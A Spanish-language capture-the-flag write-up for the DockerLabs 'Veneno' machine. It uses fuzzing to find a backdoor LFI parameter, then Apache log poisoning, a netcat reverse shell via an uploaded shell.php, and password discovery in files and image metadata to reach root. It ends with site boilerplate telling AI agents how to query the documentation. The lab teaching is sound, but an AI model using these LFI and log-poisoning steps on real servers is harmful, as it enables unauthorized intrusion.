# MAQUINA VENENO (Fuzzing parámetro LFI RCE log poisoning) MAQUINA VENENO (Fuzzing parámetro - LFI RCE - log poisoning) Enumeración de puertos, servicios y versiones. ``` nmap -p- --open --min-rate 3000 -n -Pn -sSCV 172.17.0.2 -oN fullservice.txt 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 89:9c:7b:99:95:b6:e8:03:5a:6a:d4:69:69:4a:8d:35 (ECDSA) |_ 256 ec:ec:90:44:4e:66:64:22:f6:8b:cd:29:d2:b5:60:6a (ED25519) 80/tcp open http Apache httpd 2.4.58 ((Ubuntu)) |_http-server-header: Apache/2.4.58 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works MAC Address: 02:42:AC:11:00:02 (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Enumeración de directorios ``` nmap -p80 --script=http-enum.nse 172.17.0.2 -oN directory.txt 80/tcp open http | http-enum: |_ /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.58 (ubuntu)' MAC Address: 02:42:AC:11:00:02 (Unknown) ``` Feroxbuster ``` feroxbuster -u http://172.17.0.2 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-1 ``` | 404 | GET | 9l | 31w | 272c Auto-filtering found 404-like response and created new filter | | --- | --- | ---- | ---- | ------------------------------------------------------------------ | | 403 | GET | 9l | 28w | 275c Auto-filtering found 404-like response and created new filter | | 200 | GET | 22l | 105w | 5952c | | 200 | GET | 363l | 961w | 10671c | | 200 | GET | 363l | 961w | 10671c | | 301 | GET | 9l | 28w | 310c => | | 200 | GET | 363l | 961w | 10671c | Escaneo de parámetros para [http://172.17.0.2/problems.php?"FUZZ=/etc/passwd"](http://172.17.0.2/problems.php?%22FUZZ=/etc/passwd%22) ``` ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -u http://172.17.0.2/problems.php?FUZZ=/etc/passwd -fs 10671 backdoor [Status: 200, Size: 1245, Words: 8, Lines: 26, Duration: 2ms] ``` Localización del /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys\:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games\:/usr/games\:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp\:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news\:/var/spool/news\:/usr/sbin/nologin uucp:x:10:10:uucp\:/var/spool/uucp\:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup\:/var/backups\:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin \_apt:x:42:65534::/nonexistent:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin messagebus:x:100:101::/nonexistent:/usr/sbin/nologin systemd- resolve:x:996:996:systemd Resolver:/:/usr/sbin/nologin sshd:x:101:65534::/run/sshd:/usr/sbin/nologin carlos:x:1001:1001:,,,:/home/carlos\:/bin/bash Búsqueda de mas directorios, /var/log/apache2/error.log = log poisoning ``` wfuzz -c --hc=404 --hw=0 -t 200 -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://172.17.0.2/ ``` | 000000648: | 200 | 530 L | 6261 W 73529 Ch | "/var/log/apache2/access.log" | | ---------- | --- | ----- | --------------- | ------------------------------------------------ | | 000000650: | 200 | 528 L | 6237 W 73251 Ch | "../../../../../../../var/log/apache2/access.log | ![](/files/OGhevUIUasyYLGL3MQPm) LOGPOISONING \*\*Log Poisoning\*\* (envenenamiento de logs) es una técnica utilizada por atacantes para \*\*inyectar código Como se pueden ver los log con curl voy a injectar codigo PHP en los logs. ``` curl -i -v 172.17.0.2 -A "" ``` ![](/files/WOzU46xVhTJGvRLzS13C) La petición fue aceptada, por ende ahora puedo alojar una revershell.. en este caso la mia ya fue alojada (ivan.php) ![](/files/amomqTkusX3nHOU6UqPY) ``` http://172.17.0.2/problems.php?backdoor=../../../../var/log/apache2/access.log ``` ![](/files/jMsmPzuxQ0kyvOBclRc5) Fui a la carpeta UPLOAD y allí se encontraba alojado el archivo.php ``` http://172.17.0.2/uploads/shell.php ``` ![](/files/ouH3dPm6seXfeZRRHr7F) Me puse a la escucha con netcat y dispare la revershell ![](/files/DymOTXtmTDfevYDO7AQo) En /var/www/html se encuentra alojado este archivo. ``` www-data@9c6fe7034c62:/var/www/html$ cat antiguo_y_fuerte.txt Es imposible que me acuerde de la pass es inhackeable pero se que la tengo en el mismo fichero desde fa 24 anys. trobala buscala soy el unico user del sistema. ``` Con find busque algún archivo de texto que sea de Carlos. ``` find / -type f -name "*.txt" 2>/dev/null # /usr/share/viejuno/inhackeable_pass.txt >>> pinguinochocolatero ``` Se pivoteo a Carlos mediante su password. Se listo la carpeta HOME de Carlos y hay muchas carpetas con "ls -laR" liste todo el contenido donde encontré una imagen. ``` /carpeta55: total 624 drwxr-xr-x 2 root root drwxr-x--- 1 carlos carlos -rw-r--r-- 1 root root 4096 Jun 29 2024 . 4096 Jun 13 10:01 .. 627985 Jun 29 2024 .toor.jpg ``` Como tengo python3 instalado en la maquina victima, aloje un servidor para descargar la imagen. ``` carlos@9c6fe7034c62:~/carpeta55$ which python3 /usr/bin/python3 ``` ``` carlos@9c6fe7034c62:~/carpeta55$ python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ``` En la kali descargo el archivo/ ``` wget 172.17.0.2:8000/.toor.jpg Prepended http:// to '172.17.0.2:8000/.toor.jpg' --2025-06-12 21:05:56-- http://172.17.0.2:8000/.toor.jpg Connecting to 172.17.0.2:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 627985 (613K) [image/jpeg] Saving to: ‘.toor.jpg’ .toor.jpg 100%[==============================================================>] ``` Con exiftool veo los metadatos de la imagen. ``` exiftool .toor.jpg : 13.25 : .toor.jpg : . : 628 kB : 2024:06:28 21:19:05-03:00 : 2025:06:12 21:05:56-03:00 : 2025:06:12 21:05:56-03:00 : -rw-rw-r-- : JPEG : jpg : image/jpeg : 1.01 : None : 1 : 1 : pingui1730 : 2048 : 2048 <<<<<<<<<<< posible password : Baseline DCT, Huffman coding : 8 : 3 ``` Use el siguiente comando y logre acceder como root. ``` carlos@9c6fe7034c62:~/carpeta55$ su root Password: ``` ``` root@9c6fe7034c62:/home/carlos/carpeta55# whoami root ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://1gnotus.gitbook.io/ignotus_pwn/dockerlabs/writeup/maquina-veneno-fuzzing-parametro-lfi-rce-log-poisoning.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.